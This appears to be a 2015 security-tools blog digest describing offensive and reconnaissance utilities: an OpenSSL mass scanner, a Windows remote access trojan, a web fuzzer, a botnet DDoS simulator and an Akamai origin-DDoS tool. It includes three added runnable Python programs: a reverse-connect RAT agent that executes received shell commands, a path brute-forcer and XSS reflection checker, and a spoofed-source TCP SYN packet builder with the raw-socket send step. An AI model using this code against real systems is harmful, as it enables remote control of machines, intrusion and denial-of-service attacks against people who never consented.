Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a utility that finds hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract them, delete the host file, delete unwanted streams, or export the list of found streams to a log file. It can also list multiple hidden streams on one file and correctly detects alternate data streams attached to a folder/directory. ADS matter because a stream is invisible to Explorer and to a plain "dir" listing (only "dir /R" shows it), so it is a long-standing hiding place for payloads; note that streams are silently dropped when the file is copied to a non-NTFS filesystem.


Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions, all of which can be run through a proxy:
  1. Mass-scan any CIDR range for OpenSSL vulnerabilities on port 443/tcp (https) (example: sh
  2. Scan any CIDR range for OpenSSL vulnerabilities on any custom port (example: sh port 8443)
  3. Scan every port (1-10000) on a single host individually for vulnerable OpenSSL versions (example: sh single)
  4. Scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh 192.168.0. subnet)
PROXY: The proxy option sends all connections through proxychains. You need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh 0 0 proxy) (example: sh port 8443 proxy) (example: sh single 0 proxy) (example: sh 192.168.0. subnet 0 proxy)
VULNERABILITIES CHECKED:
  1. OpenSSL Heartbleed (CVE-2014-0160)
  2. OpenSSL CCS injection (MITM) (CVE-2014-0224)
  3. POODLE, SSLv3 fallback (CVE-2014-3566)
REQUIREMENTS: The Heartbleed PoC and the OpenSSL CCS script must be present, and unicornscan, nmap and sslscan must be installed; the script checks for each of these before running.


Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source code for controlling a remote machine behind a NAT through a command-line shell on Windows. Although the core supports communication with multiple RATs, the command-line interface has limited ability to tell them apart.
The RAT process executable does not hide itself from the taskbar or Task Manager, as it was developed for educational purposes only. Please do not use it for any malicious purpose.
Contains the source code and the two binaries, packaged using ILMerge.

  1. Start the server in a command line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface

Note the direction of the connection: despite being called the "server", rat.exe is the side that connects out to the controller's address, while controller.exe is the side that listens. That outbound connection is what makes a machine behind NAT reachable, since the NAT only sees an ordinary outgoing TCP session.
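The same reverse-connection pattern as an added Python example (this is not the project's .NET code): agent() plays the part of rat.exe and dials out, run_demo() plays controller.exe on a loopback port, sends one command and collects the output. The 4-byte length-prefixed framing, the literal "exit" command and the run_demo helper are assumptions of this example, not features of the original tool.

```python
"""Reverse-connect RAT skeleton on loopback: the agent dials out to the
controller, which listens. Added example, not the project's code."""
import socket
import struct
import subprocess
import threading


def send_msg(sock: socket.socket, data: bytes) -> None:
    """Length-prefixed framing (assumption of this example): TCP is a byte
    stream, so a 4-byte big-endian length tells the peer where a message ends."""
    sock.sendall(struct.pack("!I", len(data)) + data)


def recv_msg(sock: socket.socket) -> bytes:
    """Read exactly one framed message; loops because recv may return short reads."""
    def recv_exact(n: int) -> bytes:
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer closed connection")
            buf += chunk
        return buf
    (length,) = struct.unpack("!I", recv_exact(4))
    return recv_exact(length)


def agent(controller_ip: str, controller_port: int) -> None:
    """The RAT side: connects OUT to the controller (this is what works through
    NAT), then executes commands until it receives the literal command 'exit'."""
    with socket.create_connection((controller_ip, controller_port)) as s:
        while True:
            cmd = recv_msg(s).decode()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
            send_msg(s, proc.stdout + proc.stderr)


def run_demo(command: str) -> str:
    """Controller side, demo-only helper: listen on a loopback port chosen by the
    OS, start the agent in a thread, send one command and return its output."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    t = threading.Thread(target=agent, args=("127.0.0.1", port), daemon=True)
    t.start()

    conn, _addr = listener.accept()          # the agent's inbound connection
    with conn:
        send_msg(conn, command.encode())
        output = recv_msg(conn).decode(errors="replace")
        send_msg(conn, b"exit")
    t.join(timeout=5)
    listener.close()
    return output


if __name__ == "__main__":
    print(run_demo("echo hello from the agent"))
```

A real controller would keep the listener open and track several agent sockets; the point here is only that the controller never needs to reach the agent's address, so the agent's NAT is irrelevant.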

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

 0d1n is a tool for automating customized attacks against web applications:
*brute force passwords in authentication forms
*directory disclosure (use a PATH list to brute force paths and inspect the HTTP status code of each response)
*run a test list against an input to find SQL Injection and XSS vulnerabilities
and other things.
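The two checks named above, directory disclosure by status code and a payload list against an input, as an added Python example (not 0d1n's C code). The target is a throwaway HTTP server started in a thread on loopback, with constructed routes: two existing paths, a /search page that reflects its q parameter unescaped, and 404 for everything else; the wordlist and payloads are likewise constructed.

```python
"""Directory disclosure by path list + status code, and reflection check for a
payload list, against a throwaway local HTTP server. Added example, not 0d1n."""
from __future__ import annotations
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: two "real" paths and a search page that echoes ?q= unescaped.
KNOWN_PATHS = {"/": b"home", "/admin/": b"admin panel", "/backup.zip": b"PK\x03\x04"}


class TargetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urllib.parse.urlsplit(self.path)
        if url.path == "/search":
            q = urllib.parse.parse_qs(url.query).get("q", [""])[0]
            self._reply(200, f"<p>Results for {q}</p>".encode())  # reflected, not escaped
        elif url.path in KNOWN_PATHS:
            self._reply(200, KNOWN_PATHS[url.path])
        else:
            self._reply(404, b"not found")

    def _reply(self, code: int, body: bytes) -> None:
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_target() -> str:
    """Serve the constructed site on a free loopback port; returns its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), TargetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def fetch(url: str) -> tuple[int, bytes]:
    """GET a URL and return (status, body). urllib raises on 4xx/5xx, so the
    HTTPError is caught to recover the status code the brute forcer needs."""
    try:
        with urllib.request.urlopen(url, timeout=5) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def brute_paths(base: str, wordlist: list[str]) -> dict[str, int]:
    """Request every candidate path and keep those whose status is not 404.
    403 and 301/302 also mean 'something is there'; only 404 means absent."""
    found: dict[str, int] = {}
    for path in wordlist:
        status, _ = fetch(base + path)
        if status != 404:
            found[path] = status
    return found


def reflected_payloads(base: str, param_url: str, payloads: list[str]) -> list[str]:
    """Inject each test string into the parameter and report the ones echoed back
    verbatim: a raw reflection is the first signal of an XSS sink."""
    hits = []
    for p in payloads:
        status, body = fetch(base + param_url + urllib.parse.quote(p))
        if status == 200 and p.encode() in body:
            hits.append(p)
    return hits


if __name__ == "__main__":
    base = start_target()
    print(brute_paths(base, ["/", "/admin/", "/backup.zip", "/wp-admin/", "/.git/"]))
    print(reflected_payloads(base, "/search?q=", ["<script>alert(1)</script>", "'\"><svg/onload=1>"]))
```

Against a real target the same loop needs a request rate limit and a baseline for "soft 404" pages that return 200 with an error body, otherwise every path in the list looks like a hit.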


Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

 How does TCP Spoofing work?
BoNeSi sends its requests from spoofed source addresses, sniffs for TCP packets on the network interface and answers all of them in order to complete the TCP handshakes. For this to work, all traffic from the target webserver must be routed back to the host running BoNeSi, because the target replies to the spoofed addresses, not to BoNeSi's own.
HTTP flooding attacks therefore cannot be simulated over the internet, where the webserver's answers to the spoofed addresses would never reach the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS mitigation systems or webservers directly.
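The packet-level primitive behind the explanation above, as an added Python example that is not BoNeSi's code: a TCP SYN with an arbitrary source address, built byte by byte with both checksums computed by hand, since a raw socket with IP_HDRINCL sends exactly what it is given. The addresses and ports are constructed documentation values; the block only builds and verifies the packet, and the commented send at the end needs root.

```python
"""Building a TCP SYN with a spoofed source address, the primitive behind
TCP spoofing. Added example, not BoNeSi's code. Only constructs bytes; sending
needs a raw socket with IP_HDRINCL and root (shown commented at the bottom)."""
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_spoofed_syn(src_ip: str, dst_ip: str, sport: int, dport: int, seq: int) -> bytes:
    """IPv4 + TCP SYN whose source address is whatever the caller says. The kernel
    fills nothing in for IP_HDRINCL, so both headers and checksums are ours."""
    src = socket.inet_aton(src_ip)
    dst = socket.inet_aton(dst_ip)

    # TCP header: 20 bytes, no options. Data offset 5 words, flags 0x02 = SYN.
    tcp_len = 20
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, (tcp_len // 4) << 4, 0x02, 65535, 0, 0)
    # TCP checksum covers a pseudo-header (src, dst, zero, proto, tcp length) + segment.
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]

    # IPv4 header: version 4 / IHL 5, total length 40, id, no fragmentation, TTL 64.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234, 0, 64,
                     socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def verify_checksums(packet: bytes) -> bool:
    """Recomputing a checksum over data that already contains it yields 0."""
    ip, tcp = packet[:20], packet[20:]
    pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    return checksum(ip) == 0 and checksum(pseudo + tcp) == 0


def source_ip(packet: bytes) -> str:
    """The address the target will answer to: the spoofed one, not the sender's."""
    return socket.inet_ntoa(packet[12:16])


if __name__ == "__main__":
    # Constructed values: RFC 5737 documentation addresses, not real hosts.
    pkt = build_spoofed_syn("203.0.113.7", "192.0.2.10", 40000, 80, 1)
    print(len(pkt), verify_checksums(pkt), source_ip(pkt))
    # To actually send (root required; the kernel then forwards our bytes as-is):
    # s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    # s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    # s.sendto(pkt, ("192.0.2.10", 0))
```

This is also why the lab network matters: the target's SYN-ACK goes to 203.0.113.7, so unless the route for that address leads back to the sniffing host the handshake never completes and only a half-open SYN flood results.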

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner for use during penetration testing. It chains existing pentest utilities such as theHarvester, nmap and brute-force tools against your target. Some of the features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that helps automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates, as well as vulnerabilities in Joomla itself.


Nov 7, 2015

Tools: SpiderFoot – Open Source Intelligence Automation Tool (OSINT)


There are three main areas where SpiderFoot can be useful:
  • If you are a pen-tester, SpiderFoot will automate the reconnaissance stage of the test, giving you a rich set of data to help you pinpoint areas of focus for the test.
  • Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
  • SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.


SpiderFoot has plenty of features, including the following:
  • Utilises a lot of different data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
  • Designed for maximum data extraction; every piece of data is passed on to every module that may be interested, so that it can extract further information. No piece of discovered data escapes analysis.
  • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
  • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
  • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate.
  • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
  • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
  • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
  • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.

Tools: Bluto - Recon, Subdomain Bruting, Zone Transfers

DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration
Author: Darryl Lane | Twitter: @darryllane101
The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. Each of the target domain's NS records is then queried for a zone transfer. If none of them allows one, Bluto brute forces subdomains using parallel sub-processes over the top 20000 entries of the 'Alexa Top 1 Million subdomains' list. NetCraft results are presented individually and then compared with the brute-force results; duplicates are removed and particularly interesting results are highlighted.
Bluto now also enumerates email addresses for the target domain, currently using the Bing and Google search engines. It uses a random User-Agent on each request and does a country lookup to select the fastest Google server relative to your egress address. Each request closes the connection in a further attempt to avoid captchas; excessive lookups will still trigger captchas, and Bluto warns you if any are identified.


Nov 2, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Attacks the origin host behind the Akamai edge hosts, bypassing the DDoS protection the Akamai service provides. This only works when the origin's real address can be discovered and the origin accepts connections that did not arrive through Akamai's edge; an origin that is firewalled to Akamai's address ranges cannot be reached this way.